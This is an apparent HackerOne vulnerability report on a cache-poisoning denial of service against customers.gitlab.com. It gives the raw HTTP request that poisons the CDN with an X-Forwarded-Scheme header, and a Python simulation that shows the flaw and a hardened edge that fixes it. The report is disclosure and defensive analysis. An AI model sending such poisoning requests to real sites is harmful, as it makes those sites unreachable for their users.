Cache Poisoning DOS in customers.gitlab.com
HackerOne report #2282885 by 0xdln
on 2023-12-13, assigned to @cmaxim:
Report
Sending an `x-forwarded-scheme: http` request header caused the origin to respond with a 301 redirect to the same location. Because the CDN cached that response under the URL alone (the header is not part of the cache key), every later visitor to the URL received the cached redirect pointing back at itself, producing a redirect loop that denied access to the website.
Steps to reproduce:
- To poison the cache, make the following request:

```http
GET /test.js?cb=123 HTTP/2
Host: customers.gitlab.com
X-Forwarded-Scheme: http
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Cache-Control: max-age=0
```
- Verify that it has been poisoned (with no `X-Forwarded-Scheme` header):

```http
GET /test.js?cb=123 HTTP/2
Host: customers.gitlab.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Cache-Control: max-age=0
```
- Open https://customers.gitlab.com/test.js?cb=123 in a browser: it is served the cached 301 to the same URL and fails with a redirect loop, so the resource is inaccessible.
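The mechanism above, modelled as an added example (this is illustrative code, not GitLab's or the CDN's configuration): a simulated origin that trusts any `X-Forwarded-Scheme` it sees and answers `http` with a cacheable 301 to the same URL, in front of a simulated CDN that keys its cache on host and path only. `poison_and_check` replays the report's two steps and reports whether a clean client now receives a redirect to itself. The hardened variant has the edge overwrite the header with the scheme the client actually used before forwarding, which is one of the standard fixes; the hostname is taken from the report, everything else is assumed.

```python
"""Added example: how a client-supplied X-Forwarded-Scheme header becomes a
cached self-redirect (DoS), and how a header-normalising edge prevents it.
The origin logic and cache behaviour are assumptions for illustration only."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

HOST = "customers.gitlab.com"  # hostname from the report; all behaviour here is simulated


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: bytes = b""


def origin(path: str, headers: Dict[str, str]) -> Response:
    """Assumed vulnerable origin: if it believes the request arrived over http it
    301s to the https form of the same URL, and it trusts whatever
    X-Forwarded-Scheme value reaches it. The redirect is marked cacheable."""
    scheme = headers.get("x-forwarded-scheme", "https").lower()
    if scheme != "https":
        return Response(301, {"location": f"https://{HOST}{path}",
                              "cache-control": "public, max-age=600"})
    return Response(200, {"content-type": "application/javascript",
                          "cache-control": "public, max-age=600"},
                    b"console.log('ok');")


class Cdn:
    """Assumed caching edge keyed on (host, path+query) only, so request headers
    that change the origin's answer are invisible to the cache key."""

    def __init__(self, normalise_scheme: bool):
        self.store: Dict[Tuple[str, str], Response] = {}
        self.normalise_scheme = normalise_scheme

    def get(self, url: str, headers: Optional[Dict[str, str]] = None) -> Response:
        hdrs = {k.lower(): v for k, v in (headers or {}).items()}
        parts = urlsplit(url)
        path = parts.path + (f"?{parts.query}" if parts.query else "")
        key = (parts.netloc, path)
        if key in self.store:
            return self.store[key]
        if self.normalise_scheme:
            # Hardened edge: replace any client-supplied hint with the real scheme
            # of the client connection before the request reaches the origin.
            hdrs["x-forwarded-scheme"] = parts.scheme
        resp = origin(path, hdrs)
        if "public" in resp.headers.get("cache-control", ""):
            self.store[key] = resp
        return resp


def is_self_redirect(url: str, resp: Response) -> bool:
    """True when the response is a redirect whose Location is the requested URL."""
    return resp.status in (301, 302, 307, 308) and resp.headers.get("location") == url


def poison_and_check(cdn: Cdn, url: str) -> bool:
    """Replay the report: one poisoning request with the header, then a clean one."""
    cdn.get(url, {"X-Forwarded-Scheme": "http"})  # attacker's request
    victim = cdn.get(url)                          # ordinary browser request
    return is_self_redirect(url, victim)


def demo_vulnerable() -> bool:
    return poison_and_check(Cdn(normalise_scheme=False), f"https://{HOST}/test.js?cb=123")


def demo_hardened() -> bool:
    return poison_and_check(Cdn(normalise_scheme=True), f"https://{HOST}/test.js?cb=123")


if __name__ == "__main__":
    print("vulnerable edge serves self-redirect:", demo_vulnerable())  # True
    print("hardened edge serves self-redirect:", demo_hardened())      # False
```

Two things the model makes visible that the raw requests do not: the cache key is the URL alone, so the `?cb=123` cache-buster confines the proof of concept to one entry while a real attacker would target the live asset and page URLs; and the fix can live at either layer, by normalising or stripping the header at the edge as shown, or by having the origin refuse to emit a cacheable redirect driven by an unkeyed request header.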
Impact
An attacker can poison the cached response for any URL on customers.gitlab.com, making the site and its files inaccessible to all users until the cached entry expires or is purged.